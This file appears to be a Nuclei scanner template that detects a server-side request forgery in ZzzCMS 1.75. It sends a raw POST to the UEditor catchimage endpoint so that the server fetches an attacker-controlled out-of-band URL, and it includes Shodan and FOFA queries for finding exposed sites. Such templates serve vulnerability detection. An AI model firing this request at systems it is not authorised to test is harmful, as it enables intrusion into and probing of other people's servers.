id: zzzcms-ssrf

info:
  name: ZzzCMS 1.75 - Server-Side Request Forgery
  author: ritikchaddha
  severity: high
  reference:
    - https://www.hacking8.com/bug-web/Zzzcms/Zzzcms-1.75-ssrf.html
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"ZzzCMS"
    fofa-query: title="ZzzCMS"
  tags: zzzcms,ssrf,oast
variables:
  filename: "{{to_lower(rand_text_alpha(4))}}"

http:
  - raw:
      - |
        POST /plugins/ueditor/php/controller.php?action=catchimage&upfolder=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        source[0]=http://{{interactsh-url}}/{{filename}}.txt

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - '{"state":'
          - 'list":'
        condition: and

      - type: status
        status:
          - 200

# digest: 4b0a004830460221009d3deed96cd44539c6745e7de8bfcf14e5bcfcfcc8bda5c7917d7c9a9d2d03260221009b8171617d2f5b242f940385f646ca35cfc71a3cd8a024538e25133510aebb5c:922c64590222798bb761d5b6d8e72950
